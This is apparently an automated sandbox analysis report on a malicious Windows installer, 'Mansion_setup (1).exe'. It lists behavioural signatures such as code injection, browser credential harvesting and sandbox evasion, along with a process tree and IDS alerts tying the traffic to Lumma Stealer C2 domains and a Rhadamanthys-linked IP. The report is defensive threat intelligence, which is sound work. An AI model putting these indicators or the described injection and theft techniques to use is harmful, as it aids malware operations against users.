Edit tour

Windows Analysis Report
Mansion_setup (1).exe

Overview

General Information

Sample name:	Mansion_setup (1).exe
Analysis ID:	1615829
MD5:	b51a099db70fbe7d19e9ff67e628fd41
SHA1:	f46b9367619d335451d6c5b747101e116a2d29d2
SHA256:	36be5a492b06835015566ffd1217a94ba86a274dd98e3a648848f1143619ca23
Tags:	AtlasCareHomesLimitedexeuser-SquiblydooBlog
Infos:

Detection

Score:	80
Range:	0 - 100
Confidence:	100%

Compliance

Score:	48
Range:	0 - 100

Signatures

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Allocates memory in foreign processes

Connects to many ports of the same IP (likely port scanning)

Drops large PE files

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Drops PE files

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Dllhost Internet Connection

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: Use Short Name Path in Command Line

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

Mansion_setup (1).exe (PID: 3180 cmdline: "C:\Users\user\Desktop\Mansion_setup (1).exe" MD5: B51A099DB70FBE7D19E9FF67E628FD41)

Mansion.exe (PID: 3824 cmdline: C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe MD5: 92FD2FE1716B9F3E45B6AE30FFF45D8B)

Mansion.exe (PID: 3896 cmdline: "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1660 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 92FD2FE1716B9F3E45B6AE30FFF45D8B)

explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

MSBuild.exe (PID: 6176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 4208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 344 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 4908 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

svchost.exe (PID: 3696 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

chrome.exe (PID: 3024 cmdline: --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrE697.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c75c1857/bd5c97e1" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 5996 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2096,i,7666385675108331514,3856656827583616406,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

msedge.exe (PID: 5528 cmdline: --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrEBD8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c75c1857/0da50779" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2404 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=1980,i,2109797830624315799,4341307213657690466,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

wmlaunch.exe (PID: 7072 cmdline: "C:\Program Files\Windows Media Player\wmlaunch.exe" MD5: 836F3636C231980EAD81C84BCA55D82B)

dllhost.exe (PID: 1152 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)

Mansion.exe (PID: 6680 cmdline: "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --mojo-platform-channel-handle=2940 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 92FD2FE1716B9F3E45B6AE30FFF45D8B)

Mansion.exe (PID: 3268 cmdline: "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --app-path="C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1739628551283596 --launch-time-ticks=4519743123 --mojo-platform-channel-handle=3100 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1 MD5: 92FD2FE1716B9F3E45B6AE30FFF45D8B)

ExtractJPEGcmd.exe (PID: 4308 cmdline: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe MD5: 98FD0CECF45A8DC755F232E073B509E7)

qtZint.exe (PID: 6804 cmdline: C:\games\DDR5_NetCache\qtZint.exe MD5: 1944E1DC273E06252EAE4971DEBC0D91)

cleanup

Sigma Signatures

System Summary

Sigma detected: Dllhost Internet Connection

Source: Network Connection

Author: bartblaze: Data: DestinationIp: 45.91.193.85, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 1152, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49424

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4056, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 4908, ProcessName: svchost.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe, ParentCommandLine: "C:\Users\user\Desktop\Mansion_setup (1).exe", ParentImage: C:\Users\user\Desktop\Mansion_setup (1).exe, ParentProcessId: 3180, ParentProcessName: Mansion_setup (1).exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe, ProcessId: 3824, ProcessName: Mansion.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4056, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 4908, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (actiothreaz .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T15:12:23.753196+0100	2059907	1	Domain Observed Used for C2 Detected	192.168.2.7	49838	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (breedertremnd .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T15:12:23.778818+0100	2059911	1	Domain Observed Used for C2 Detected	192.168.2.7	52589	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (garulouscuto .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T15:12:23.764314+0100	2059915	1	Domain Observed Used for C2 Detected	192.168.2.7	62062	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (importenptoc .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T15:12:23.673227+0100	2059919	1	Domain Observed Used for C2 Detected	192.168.2.7	61559	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inputrreparnt .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T15:12:23.704040+0100	2059921	1	Domain Observed Used for C2 Detected	192.168.2.7	54134	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T15:12:23.740271+0100	2059927	1	Domain Observed Used for C2 Detected	192.168.2.7	62092	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (torpdidebar .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T15:12:23.714613+0100	2059931	1	Domain Observed Used for C2 Detected	192.168.2.7	60313	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (voicesharped .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T15:12:23.689719+0100	2059933	1	Domain Observed Used for C2 Detected	192.168.2.7	64523	1.1.1.1	53	UDP

ETPRO JA3 HASH Suspected Malware Related Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T15:13:00.348988+0100	2854824	2	Potentially Bad Traffic	45.91.193.85	1308	192.168.2.7	49422	TCP
2025-02-15T15:13:09.159523+0100	2854824	2	Potentially Bad Traffic	45.91.193.85	1308	192.168.2.7	49423	TCP

ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T15:11:13.659837+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49444	TCP
2025-02-15T15:12:42.538467+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	1308	192.168.2.7	49408	TCP
2025-02-15T15:13:00.348988+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	1308	192.168.2.7	49422	TCP
2025-02-15T15:13:09.159523+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	1308	192.168.2.7	49423	TCP
2025-02-15T15:13:15.396583+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49424	TCP
2025-02-15T15:13:21.981827+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49425	TCP
2025-02-15T15:13:28.588099+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49426	TCP
2025-02-15T15:13:35.176367+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49427	TCP
2025-02-15T15:13:41.748771+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49428	TCP
2025-02-15T15:13:48.647380+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49429	TCP
2025-02-15T15:13:54.929001+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49430	TCP
2025-02-15T15:14:01.521885+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49431	TCP
2025-02-15T15:14:08.120183+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49432	TCP
2025-02-15T15:14:14.708313+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49433	TCP
2025-02-15T15:14:21.352706+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49434	TCP
2025-02-15T15:14:27.901537+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49435	TCP
2025-02-15T15:14:34.540723+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49436	TCP
2025-02-15T15:14:41.227985+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49437	TCP
2025-02-15T15:14:47.692291+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49438	TCP
2025-02-15T15:14:54.280426+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49439	TCP
2025-02-15T15:15:00.965894+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49440	TCP
2025-02-15T15:15:07.575131+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49441	TCP
2025-02-15T15:15:14.178153+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49442	TCP
2025-02-15T15:15:20.791252+0100	2854802	1	Domain Observed Used for C2 Detected	45.91.193.85	443	192.168.2.7	49443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Compliance

Uses 32bit PE files

Source: Mansion_setup (1).exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Creates license or readme file

Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\7z-out\LICENSE.electron.txt			Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\LICENSE.electron.txt			Jump to behavior

PE / OLE file has a valid certificate

Source: Mansion_setup (1).exe

Static PE information: certificate valid

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49424 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49425 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49426 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49427 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49428 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49429 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49430 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49431 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49432 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49433 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49434 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49435 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49436 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49437 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49438 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49439 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49440 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49441 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49442 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49443 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49444 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Mansion_setup (1).exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Spreading

Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File opened: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\7z-out\resources	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File opened: C:\Users\user\Desktop\Mansion_setup (1).exe	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File opened: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\app-64.7z	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File opened: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\7z-out\locales	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2059931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (torpdidebar .com) : 192.168.2.7:60313 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059915 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (garulouscuto .com) : 192.168.2.7:62062 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059911 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (breedertremnd .com) : 192.168.2.7:52589 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059907 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (actiothreaz .com) : 192.168.2.7:49838 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.2.7:62092 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059933 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (voicesharped .com) : 192.168.2.7:64523 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inputrreparnt .com) : 192.168.2.7:54134 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:1308 -> 192.168.2.7:49408
Source: Network traffic	Suricata IDS: 2059919 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (importenptoc .com) : 192.168.2.7:61559 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:1308 -> 192.168.2.7:49422
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:1308 -> 192.168.2.7:49423
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49424
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49426
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49425
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49432
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49429
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49433
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49440
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49431
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49428
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49439
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49435
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49427
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49434
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49436
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49437
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49443
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49438
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49442
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49430
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49441
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.91.193.85:443 -> 192.168.2.7:49444

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 45.91.193.85 1308

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 45.91.193.85 ports 0,1,3,443,8,1308

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.7:49408 -> 45.91.193.85:1308

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.7:49336 -> 162.159.36.2:53

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 62.149.0.30 62.149.0.30
Source: Joe Sandbox View	IP Address: 169.229.128.134 169.229.128.134
Source: Joe Sandbox View	IP Address: 129.6.15.28 129.6.15.28

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: HOSTCRAMHostCramLLCUS HOSTCRAMHostCramLLCUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 45.91.193.85:1308 -> 192.168.2.7:49422
Source: Network traffic	Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 45.91.193.85:1308 -> 192.168.2.7:49423

Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
